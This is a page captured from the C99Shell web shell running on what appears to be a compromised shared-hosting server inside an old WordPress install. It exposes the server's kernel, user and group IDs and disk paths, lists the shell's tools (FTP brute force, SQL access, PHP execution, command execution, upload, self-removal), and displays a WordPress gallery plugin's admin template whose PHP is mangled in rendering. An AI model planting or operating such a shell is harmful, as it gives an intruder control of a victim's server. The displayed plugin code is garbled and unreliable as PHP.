!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/gallery-images/templates/admin/   drwxr-xr-x
Free 179.59 GB of 490.84 GB (36.59%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     galleries-list.php (6.86 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
if ( ! defined'ABSPATH' ) ) {
    exit; 
// Exit if accessed directly
}
global 
$wpdb;
$gallery_wp_nonce_add_gallery    wp_create_nonce'gallery_wp_nonce_add_gallery' );
?>

<div class="wrap">
    <?php require( GALLERY_IMG_TEMPLATES_PATH DIRECTORY_SEPARATOR 'admin' DIRECTORY_SEPARATOR 'free-banner.php' ); ?>
    <?php $path_site plugins_url"../images"__FILE__ ); ?>
    <div style="clear: both;"></div>
    <div id="poststuff">
        <div id="gallerys-list-page">
            <form method="post" onkeypress="galleryImgDoNothing()" action="admin.php?page=galleries_huge_it_gallery"
                  id="admin_form" name="admin_form">
                <h2>Huge-IT <?php echo __'Galleries''gallery-images' ); ?>
                    <a onclick="window.location.href='admin.php?page=galleries_huge_it_gallery&task=add_gallery&gallery_wp_nonce_add_gallery=<?php echo $gallery_wp_nonce_add_gallery?>'"
                       class="add-new-h2"><?php echo __'Add New Gallery''gallery-images' ); ?></a>
                </h2>
                <?php
                $serch_value 
'';
                if ( isset( 
$_POST['serch_or_not'] ) ) {
                    if ( 
$_POST['serch_or_not'] == "search" ) {
                        
$serch_value esc_htmlstripslashes$_POST['search_events_by_title'] ) );
                    } else {
                        
$serch_value "";
                    }
                }
                
$serch_fields '<div class="alignleft actions"">
                <label for="search_events_by_title" style="font-size:14px">Filter: </label>
                    <input type="text" name="search_events_by_title" value="' 
$serch_value '" id="search_events_by_title" onchange="clear_serch_texts()">
            </div>
            <div class="alignleft actions">
                <input type="button" value="Search" onclick="document.getElementById(\'page_number\').value=\'1\'; document.getElementById(\'serch_or_not\').value=\'search\';
                 document.getElementById(\'admin_form\').submit();" class="button-secondary action">
                 <input type="button" value="Reset" onclick="window.location.href=\'admin.php?page=galleries_huge_it_gallery\'" class="button-secondary action">
            </div>'
;


                
?>
                <table class="wp-list-table widefat fixed pages" style="width:95%">
                    <thead>
                    <tr>
                        <th scope="col" id="id" style="width:30px">
                            <span><?php echo __'ID''gallery-images' ); ?></span><span
                                class="sorting-indicator"></span></th>
                        <th scope="col" id="name" style="width:85px">
                            <span><?php echo __'Name''gallery-images' ); ?></span><span
                                class="sorting-indicator"></span></th>
                        <th scope="col" id="prod_count" style="width:40px;">
                            <span><?php echo __'Images''gallery-images' ); ?></span><span
                                class="sorting-indicator"></span></th>
                        <th style="width:40px"><span><?php echo __('Duplicate''gallery-images' ); ?></span><span
                                class="sorting-indicator"></span></th>
                        <th style="width:40px"><span><?php echo __'Delete''gallery-images' ); ?></span><span
                                class="sorting-indicator"></span></th>
                    </tr>
                    </thead>
                    <tbody>
                    <?php
                    $trcount 
1;
                    for ( 
$i 0$i count$rows ); $i ++ ) {
                        
$trcount ++;
                        
$ka0 0;
                        
$ka1 0;
                        if ( isset( 
$rows$i ]->id ) ) {
                            if ( 
$rows$i ]->sl_width == $rows$i ]->sl_width ) {
                                
$x1  $rows$i ]->id;
                                
$x2  $rows$i ]->id;
                                
$ka0 1;
                            } else {
                                
$jj 2;
                                while ( isset( 
$rows$i $jj ] ) ) {
                                    if ( 
$rows$i ]->sl_width == $rows$i $jj ]->sl_width ) {
                                        
$ka0 1;
                                        
$x1  $rows$i ]->id;
                                        
$x2  $rows$i $jj ]->id;
                                        break;
                                    }
                                    
$jj ++;
                                }
                            }
                            if ( 
$ka0 ) {
                                
$move_up '<span><a href="#reorder" onclick="return galleryImgListItemTask(\'' $x1 '\',\'' $x2 '\')" title="Move Up">   <img src="' plugins_url'images/uparrow.png'__FILE__ ) . '" width="16" height="16" border="0" alt="Move Up"></a></span>';
                            } else {
                                
$move_up "";
                            }
                        } else {
                            
$move_up "";
                        }


                        if ( isset( 
$rows$i ]->id ) ) {

                            if ( 
$rows$i ]->sl_width == $rows$i ]->sl_width ) {
                                
$x1  $rows$i ]->id;
                                
$x2  $rows$i ]->id;
                                
$ka1 1;
                            } else {
                                
$jj 2;
                                while ( isset( 
$rows$i $jj ] ) ) {
                                    if ( 
$rows$i ]->sl_width == $rows$i $jj ]->sl_width ) {
                                        
$ka1 1;
                                        
$x1  $rows$i ]->id;
                                        
$x2  $rows$i $jj ]->id;
                                        break;
                                    }
                                    
$jj ++;
                                }
                            }

                            if ( 
$ka1 ) {
                                
$move_down '<span><a href="#reorder" onclick="return galleryImgListItemTask(\'' $x1 '\',\'' $x2 '\')" title="Move Down">  <img src="' plugins_url'images/downarrow.png'__FILE__ ) . '" width="16" height="16" border="0" alt="Move Down"></a></span>';
                            } else {
                                
$move_down "";
                            }
                        }

                        
$uncat $rows$i ]->par_name;
                        if ( isset( 
$rows$i ]->prod_count ) ) {
                            
$pr_count $rows$i ]->prod_count;
                        } else {
                            
$pr_count 0;
                        }
                        
$huge_it_gallery_nonce_remove_gallery wp_create_nonce'huge_it_gallery_nonce_remove_gallery' $rows$i ]->id );
                        
$huge_it_gallery_nonce_duplicate_gallery wp_create_nonce('huge_it_gallery_nonce_duplicate_gallery'.$rows[$i]->id);
                        
?>
                        <tr <?php if ( $trcount == ) {
                            echo 
'class="has-background"';
                        } 
?>>
                            <td><?php echo $rows$i ]->id?></td>
                            <td>
                                <a href="admin.php?page=galleries_huge_it_gallery&task=edit_cat&id=<?php echo $rows$i ]->id ?>"><?php echo esc_htmlstripslashes$rows$i ]->name ) ); ?></a>
                            </td>
                            <td>(<?php if ( ! ( $pr_count ) ) {
                                    echo 
'0';
                                } else {
                                    echo 
$rows$i ]->prod_count;
                                } 
?>)
                            </td>
                            <td>
                                <a href="admin.php?page=galleries_huge_it_gallery&task=duplicate_gallery_image&id=<?php echo $rows$i ]->id?>&gallery_duplicate_nonce=<?php echo $huge_it_gallery_nonce_duplicate_gallery?>" class="duplicate-link"><span class="duplicate-icon"></span></a>
                            <td>
                                <a href="admin.php?page=galleries_huge_it_gallery&task=remove_gallery&id=<?php echo $rows$i ]->id?>&huge_it_gallery_nonce_remove_gallery=<?php echo $huge_it_gallery_nonce_remove_gallery?>" class="delete-link" ><span class="delete-icon"></span></a>
                            </td>
                        </tr>
                    <?php ?>
                    </tbody>
                </table>
                <input type="hidden" name="oreder_move" id="oreder_move" value=""/>
                <input type="hidden" name="asc_or_desc" id="asc_or_desc"
                       value="<?php if ( isset( $_POST['asc_or_desc'] ) ) {
                           echo 
esc_attr($_POST['asc_or_desc']);
                       } 
?>"/>
                <input type="hidden" name="order_by" id="order_by" value="<?php if ( isset( $_POST['order_by'] ) ) {
                    echo 
esc_attr($_POST['order_by']);
                } 
?>"/>
                <input type="hidden" name="saveorder" id="saveorder" value=""/>

                <?php
                ?>


            </form>
        </div>
    </div>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0079 ]--